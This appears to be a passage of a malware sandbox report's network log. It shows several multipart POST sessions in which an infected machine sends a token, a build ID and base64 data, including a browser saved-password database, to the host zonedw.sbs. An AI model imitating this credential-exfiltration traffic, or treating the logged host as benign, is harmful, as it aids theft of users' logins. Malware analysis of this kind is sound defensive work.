2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 Data Ascii: ------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BS2D2V3W4EUAAIWBIWT2Cont
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44 Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:30 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	50073	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:32 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PZ58QIMOZU37QIEU3E3E User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:32 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 49 45 55 33 45 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 49 45 55 33 45 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 49 45 55 33 45 33 45 0d 0a 43 6f 6e 74 Data Ascii: ------PZ58QIMOZU37QIEU3E3EContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------PZ58QIMOZU37QIEU3E3EContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------PZ58QIMOZU37QIEU3E3ECont
2024-12-14 11:57:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:32 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:32 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	50081	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:34 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----689H4O89RQIMYUKNYC2N User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 38 39 48 34 4f 38 39 52 51 49 4d 59 55 4b 4e 59 43 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 36 38 39 48 34 4f 38 39 52 51 49 4d 59 55 4b 4e 59 43 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 36 38 39 48 34 4f 38 39 52 51 49 4d 59 55 4b 4e 59 43 32 4e 0d 0a 43 6f 6e 74 Data Ascii: ------689H4O89RQIMYUKNYC2NContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------689H4O89RQIMYUKNYC2NContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------689H4O89RQIMYUKNYC2NCont
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 